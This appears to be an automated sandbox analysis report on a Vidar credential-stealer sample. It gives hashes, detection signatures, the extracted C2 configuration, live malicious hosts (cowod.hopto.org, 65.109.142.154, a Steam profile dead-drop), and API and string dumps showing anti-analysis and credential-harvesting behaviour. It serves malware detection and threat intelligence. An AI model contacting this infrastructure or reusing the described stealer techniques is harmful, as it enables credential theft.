Windows Analysis Report
aZm1EZ2IYr.exe

Overview

General Information

Sample name: aZm1EZ2IYr.exe (renamed because the original name is a hash value)
Original sample name: 1e1d5412616216fd90ea3cb6a87353db.exe
Analysis ID: 1538067
MD5: 1e1d5412616216fd90ea3cb6a87353db
SHA1: da0ae99aebbde6433c8dc985e8c8b2305cdb9b54
SHA256: 765eb00651ebf6ddbc9c8d6e687292dae89f0d8260cea08505020992835208d8
Tags: 32, exe, trojan, Vidar

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Country aware sample found (crashes after keyboard check)
Machine Learning detection for sample
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Classification

Process Tree

  • System is w10x64
  • aZm1EZ2IYr.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\aZm1EZ2IYr.exe" MD5: 1E1D5412616216FD90EA3CB6A87353DB)
    • WerFault.exe (PID: 7828 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 2220 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7892 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 2384 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware configuration (Vidar):
{"C2 url": ["https://steamcommunity.com/profiles/76561199786602107"], "Botnet": "df523263f44cc8d55414a260a0197e4a"}

Yara matches on the submitted sample

Source | Rule | Description | Author
aZm1EZ2IYr.exe | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
aZm1EZ2IYr.exe | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
aZm1EZ2IYr.exe | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security

Yara matches on memory dumps

Source | Rule | Description | Author
00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000000.00000000.1668857258.00000000001B0000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000000.00000000.1668857258.00000000001B0000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
(3 further memory-dump matches are not shown in this excerpt)

Yara matches on unpacked PEs

Source | Rule | Description | Author
0.2.aZm1EZ2IYr.exe.180000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0.2.aZm1EZ2IYr.exe.180000.0.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
0.0.aZm1EZ2IYr.exe.180000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0.0.aZm1EZ2IYr.exe.180000.0.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security

                          No Sigma rule has matched

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-20T08:35:25.223918+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 65.109.142.154 | 443 | TCP

                          AV Detection

Source: aZm1EZ2IYr.exe, Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199786602107"], "Botnet": "df523263f44cc8d55414a260a0197e4a"}
Source: cowod.hopto.org, Virustotal: Detection: 12%
Source: http://cowod.hopto.org/p, Virustotal: Detection: 7%
Source: aZm1EZ2IYr.exe, ReversingLabs: Detection: 73%
Source: aZm1EZ2IYr.exe, Virustotal: Detection: 60%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.2% probability
Source: aZm1EZ2IYr.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_00188048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00188048
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_001880A1 CryptUnprotectData,LocalAlloc,LocalFree,0_2_001880A1
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_00191E32 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00191E32
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_0018A7AD _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,0_2_0018A7AD
Source: aZm1EZ2IYr.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 65.109.142.154:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_00196013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00196013
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_0018B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018B914
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_00195B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00195B4D
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_0019547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_0019547D
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_00189CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00189CF1
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_00194D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,0_2_00194D08
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_0018CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0018CD0C
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_0018D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018D59B
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_00181D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00181D80
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_0018B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0018B5B4
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_0018BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0018BF22
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_00195182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00195182
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 0_2_001814AD
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 4x nop then mov dword ptr [ebp-04h], eax 0_2_001814AD

                          Networking

Source: Malware configuration extractor, URLs: https://steamcommunity.com/profiles/76561199786602107
Source: global traffic, HTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /lpnjoke HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View, IP Address: 104.102.49.254
Source: Joe Sandbox View, IP Address: 149.154.167.99
Source: Joe Sandbox View, ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View, JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49740 -> 65.109.142.154:443
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 65.109.142.154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown, TCP traffic detected without corresponding DNS query: 65.109.142.154 (9 occurrences)
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 occurrences)
Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe, Code function: 0_2_00186963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00186963
Source: aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic, DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic, DNS traffic detected: DNS query: t.me
Source: global traffic, DNS traffic detected: DNS query: cowod.hopto.org
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://127.0.0.1:27060
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: http://cowod.hopto
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: http://cowod.hopto.
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: http://cowod.hopto.ered.com/explore/
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: http://cowod.hopto.org
Source: aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003B3D000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://cowod.hopto.org/
Source: aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003B3D000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://cowod.hopto.org/p
Source: aZm1EZ2IYr.exe, String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: http://cowod.hopto.orgclass=
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: http://cowod.hopto.orgsive/header_logo.png
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: http://cowod.hopto.re
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: http://cowod.hoptotml
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: http://cowod.hoptowered.com/explore/
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: http://cowod.oudflare
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: http://ore.steampowered.com/explore/
Source: Amcache.hve.6.dr, String found in binary or memory: http://upx.sf.net
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199786602107[1].htm.0.dr, String found in binary or memory: https://65.109.142.154
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1948640498.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://65.109.142.154/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://65.109.142.154/C
Source: aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://api.steampowered.com/
Source: 76561199786602107[1].htm.0.dr, String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://checkout.steampowered.com/
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: https://community.c
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: https://community.cloudflare.stea
Source: aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/app
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=D_iTAfDsLH
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=4Xou
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&l=englis
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&l=
